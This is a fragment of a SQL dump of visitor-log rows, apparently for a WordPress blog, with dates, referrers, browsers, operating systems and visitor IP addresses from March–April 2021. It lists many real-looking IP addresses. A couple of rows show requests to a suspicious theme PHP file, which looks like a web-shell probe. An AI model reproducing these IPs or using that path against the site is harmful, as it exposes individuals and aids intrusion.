(10108,'2021-03-24','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','81.69.191.124','000',0,1,0),
(10109,'2021-03-24','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.4.163.148','000',0,1,0),
(10110,'2021-03-24','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.226.36','000',0,1,0),
(10111,'2021-03-24','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,1,0),
(10112,'2021-03-24','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.219.20','000',0,1,0),
(10113,'2021-03-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','221.205.136.175','000',0,1,0),
(10114,'2021-03-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10115,'2021-03-25','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.243.11.95','000',0,1,0),
(10116,'2021-03-25','https://duckduckgo.com/','Chrome','Android','9',NULL,NULL,'','212.252.140.143','000',0,1,0),
(10117,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.90.110.146','000',0,1,0),
(10118,'2021-03-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','107.23.248.51','000',0,1,0),
(10119,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,1,0),
(10120,'2021-03-25','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','139.199.141.63','000',0,1,0),
(10121,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','123.14.250.142','000',0,1,0),
(10122,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','145.255.21.27','000',0,2,0),
(10123,'2021-03-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(10124,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.136.39','000',0,1,0),
(10125,'2021-03-25','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','148.70.46.235','000',0,3,0),
(10126,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.199.138','000',0,1,0),
(10127,'2021-03-25','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','35.247.249.191','000',0,1,0),
(10128,'2021-03-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(10129,'2021-03-25','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.215.185.206','000',0,1,0),
(10130,'2021-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.190.64','000',0,1,0),
(10131,'2021-03-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10132,'2021-03-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.210.19.243','000',0,1,0),
(10133,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(10134,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10135,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10136,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10137,'2021-03-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10138,'2021-03-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(10139,'2021-03-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.238.243','000',0,1,0),
(10140,'2021-03-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.191.237.107','000',0,1,0),
(10141,'2021-03-25','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','93.66.147.166','000',0,2,0),
(10142,'2021-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','136.169.243.23','000',0,1,0),
(10143,'2021-03-25','https://duckduckgo.com/','Firefox','Windows','10.0',NULL,NULL,'','70.51.157.27','000',0,1,0),
(10144,'2021-03-25','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','193.227.40.67','000',0,1,0),
(10145,'2021-03-26','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','200.120.80.153','000',0,1,0),
(10146,'2021-03-26','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(10147,'2021-03-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10148,'2021-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.124.37','000',0,1,0),
(10149,'2021-03-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(10150,'2021-03-26','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','134.122.78.92','000',0,1,0),
(10151,'2021-03-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(10152,'2021-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.183.82','000',0,1,0),
(10153,'2021-03-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.33.68.182','000',0,1,0),
(10154,'2021-03-26','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','186.52.172.109','000',0,1,0),
(10155,'2021-03-26','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.40.225','000',0,2,0),
(10156,'2021-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,3,0),
(10157,'2021-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10158,'2021-03-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(10159,'2021-03-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,1,0),
(10160,'2021-03-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,6,0),
(10161,'2021-03-27','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','14.15.1.248','000',0,1,0),
(10162,'2021-03-27','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','159.138.82.45','000',0,1,0),
(10163,'2021-03-27','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.171','000',0,1,0),
(10164,'2021-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.168.148','000',0,1,0),
(10165,'2021-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.18.229.146','000',0,2,0),
(10166,'2021-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.211.154','000',0,1,0),
(10167,'2021-03-27','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.215.73.27','000',0,1,0),
(10168,'2021-03-27','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.210.141.167','000',0,1,0),
(10169,'2021-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.152.199.252','000',0,2,0),
(10170,'2021-03-27','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','183.220.226.109','000',0,1,0),
(10171,'2021-03-27','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','62.74.7.221','000',0,1,0),
(10172,'2021-03-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10173,'2021-03-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(10174,'2021-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,2,0),
(10175,'2021-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10176,'2021-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10177,'2021-03-27','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,1,0),
(10178,'2021-03-27','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','159.146.65.119','000',0,1,0),
(10179,'2021-03-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(10180,'2021-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,1,0),
(10181,'2021-03-28','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.171.88.40','000',0,1,0),
(10182,'2021-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(10183,'2021-03-28','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(10184,'2021-03-28','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.67','000',0,1,0),
(10185,'2021-03-28','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.114','000',0,1,0),
(10186,'2021-03-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(10187,'2021-03-28','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','118.33.118.27','000',0,1,0),
(10188,'2021-03-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','194.165.16.78','000',0,1,0),
(10189,'2021-03-28','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','90.29.11.42','000',0,1,0),
(10190,'2021-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(10191,'2021-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.186.210','000',0,1,0),
(10192,'2021-03-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.239.89.216','000',0,1,0),
(10193,'2021-03-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','36.27.208.157','000',0,2,0),
(10194,'2021-03-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,1,0),
(10195,'2021-03-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(10196,'2021-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.222.59','000',0,1,0),
(10197,'2021-03-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10198,'2021-03-28','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.99.47.78','000',0,1,0),
(10199,'2021-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10200,'2021-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(10201,'2021-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(10202,'2021-03-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.152.199.90','000',0,8,0),
(10203,'2021-03-28','http://design-arena.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','192.36.52.37','000',0,1,0),
(10204,'2021-03-29','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','95.110.233.213','000',0,1,0),
(10205,'2021-03-29','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','167.172.197.19','000',0,1,0),
(10206,'2021-03-29','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','165.231.101.132','000',0,87,0),
(10207,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.211.9.118','000',0,2,0),
(10208,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.234.176','000',0,1,0),
(10209,'2021-03-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(10210,'2021-03-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10211,'2021-03-29','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','138.68.43.240','000',0,1,0),
(10212,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.42.169','000',0,1,0),
(10213,'2021-03-29','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','70.51.157.27','000',0,1,0),
(10214,'2021-03-29','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','209.171.88.23','000',0,2,0),
(10215,'2021-03-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','42.6.110.223','000',0,3,0),
(10216,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.90.227.221','000',0,1,0),
(10217,'2021-03-29','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.11.153','000',0,2,0),
(10218,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,1,0),
(10219,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.106.19.5','000',0,2,0),
(10220,'2021-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(10221,'2021-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(10222,'2021-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10223,'2021-03-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','185.14.163.108','000',0,3,0),
(10224,'2021-03-29','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','161.35.181.44','000',0,1,0),
(10225,'2021-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.172.16','000',0,1,0),
(10226,'2021-03-30','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,2,0),
(10227,'2021-03-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.165','000',0,3,0),
(10228,'2021-03-30','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','192.227.156.26','000',0,2,0),
(10229,'2021-03-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10230,'2021-03-30','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(10231,'2021-03-30','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','106.251.42.36','000',0,1,0),
(10232,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.205.38.26','000',0,1,0),
(10233,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.170.50','000',0,1,0),
(10234,'2021-03-30','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.193.208','000',0,1,0),
(10235,'2021-03-30','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','79.137.34.146','000',0,2,0),
(10236,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','199.249.230.163','000',0,3,0),
(10237,'2021-03-30','http://ictbank.ir/blog','Chrome','NetBSD','',NULL,NULL,'','91.149.225.120','000',0,3,0),
(10238,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','199.249.230.176','000',0,2,0),
(10239,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.249.230.153','000',0,1,0),
(10240,'2021-03-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,18,0),
(10241,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.135.72','000',0,1,0),
(10242,'2021-03-30','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','207.154.246.132','000',0,1,0),
(10243,'2021-03-30','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','185.220.101.17','000',0,3,0),
(10244,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','23.129.64.204','000',0,3,0),
(10245,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.102.246','000',0,1,0),
(10246,'2021-03-30','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','185.220.101.138','000',0,1,0),
(10247,'2021-03-30','http://ictbank.ir/blog','Chrome','NetBSD','',NULL,NULL,'','104.149.145.238','000',0,1,0),
(10248,'2021-03-30','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','137.59.228.180','000',0,3,0),
(10249,'2021-03-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','175.142.113.32','000',0,3,0),
(10250,'2021-03-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.58','000',0,1,0),
(10251,'2021-03-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','45.154.255.68','000',0,3,0),
(10252,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','162.247.74.213','000',0,1,0),
(10253,'2021-03-30','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','209.141.45.189','000',0,2,0),
(10254,'2021-03-30','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.220.100.255','000',0,1,0),
(10255,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','213.164.204.152','000',0,2,0),
(10256,'2021-03-30','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,3,0),
(10257,'2021-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.45.148','000',0,1,0),
(10258,'2021-03-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(10259,'2021-03-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','192.162.101.62','000',0,1,0),
(10260,'2021-03-30','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','24.15.82.66','000',0,1,0),
(10261,'2021-03-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10262,'2021-03-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(10263,'2021-03-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10264,'2021-03-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.165','000',0,6,0),
(10265,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','143.198.96.51','000',0,1,0),
(10266,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','159.89.89.137','000',0,2,0),
(10267,'2021-03-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','114.119.128.196','000',0,2,0),
(10268,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.53.208.18','000',0,6,0),
(10269,'2021-03-31','http://ictbank.ir/','Chrome','Windows','6.3',NULL,NULL,'','175.147.54.26','000',0,1,0),
(10270,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','54.176.188.51','000',0,1,0),
(10271,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.18.210','000',0,1,0),
(10272,'2021-03-31','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','36.81.1.82','000',0,2,0),
(10273,'2021-03-31','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','125.136.58.91','000',0,1,0),
(10274,'2021-03-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.137.199.217','000',0,33,0),
(10275,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','157.230.238.8','000',0,2,0),
(10276,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.103.170','000',0,1,0),
(10277,'2021-03-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10278,'2021-03-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','123.160.173.30','000',0,1,0),
(10279,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','139.155.205.162','000',0,1,0),
(10280,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(10281,'2021-03-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(10282,'2021-03-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(10283,'2021-03-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10284,'2021-03-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10285,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','60.30.17.19','000',0,1,0),
(10286,'2021-03-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(10287,'2021-03-31','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','81.68.248.98','000',0,1,0),
(10288,'2021-03-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(10289,'2021-04-01','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,1,0),
(10290,'2021-04-01','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','194.78.97.21','000',0,1,0),
(10291,'2021-04-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.254.171','000',0,1,0),
(10292,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(10293,'2021-04-01','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(10294,'2021-04-01','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','121.5.28.65','000',0,1,0),
(10295,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.32.3.57','000',0,1,0),
(10296,'2021-04-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,2,0),
(10297,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.44.80','000',0,1,0),
(10298,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.157','000',0,1,0),
(10299,'2021-04-01','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','18.231.94.162','000',0,1,0),
(10300,'2021-04-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.75.99.14','000',0,2,0),
(10301,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.172.175','000',0,1,0),
(10302,'2021-04-01','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','183.17.230.118','000',0,1,0),
(10303,'2021-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,3,0),
(10304,'2021-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10305,'2021-04-01','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','139.59.42.108','000',0,2,0),
(10306,'2021-04-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.142','000',0,1,0),
(10307,'2021-04-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.165','000',0,3,0),
(10308,'2021-04-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','172.104.27.241','000',0,1,0),
(10309,'2021-04-01','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,5,0),
(10310,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.137.181.37','000',0,1,0),
(10311,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','112.66.97.110','000',0,1,0),
(10312,'2021-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.96.134.115','000',0,56,0),
(10313,'2021-04-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,3,0),
(10314,'2021-04-02','http://ictbank.ir/blog','Chrome','Fedora','Unknown',NULL,NULL,'','73.241.45.126','000',0,1,0),
(10315,'2021-04-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(10316,'2021-04-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','125.36.243.217','000',0,3,0),
(10317,'2021-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.190.182','000',0,1,0),
(10318,'2021-04-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.147.9','000',0,1,0),
(10319,'2021-04-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.165','000',0,3,0),
(10320,'2021-04-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10321,'2021-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.45.153','000',0,1,0),
(10322,'2021-04-02','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','37.230.113.214','000',0,2,0),
(10323,'2021-04-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,1,0),
(10324,'2021-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(10325,'2021-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10326,'2021-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10327,'2021-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10328,'2021-04-02','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','165.231.33.148','000',0,2,0),
(10329,'2021-04-02','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','103.13.88.90','000',0,2,0),
(10330,'2021-04-02','http://ictbank.ir/blog','UC Browser','Series60','5',NULL,NULL,'','5.180.62.106','000',0,2,0),
(10331,'2021-04-02','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(10332,'2021-04-03','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','130.61.137.204','000',0,2,0),
(10333,'2021-04-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','122.136.130.211','000',0,1,0),
(10334,'2021-04-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','27.224.137.185','000',0,1,0),
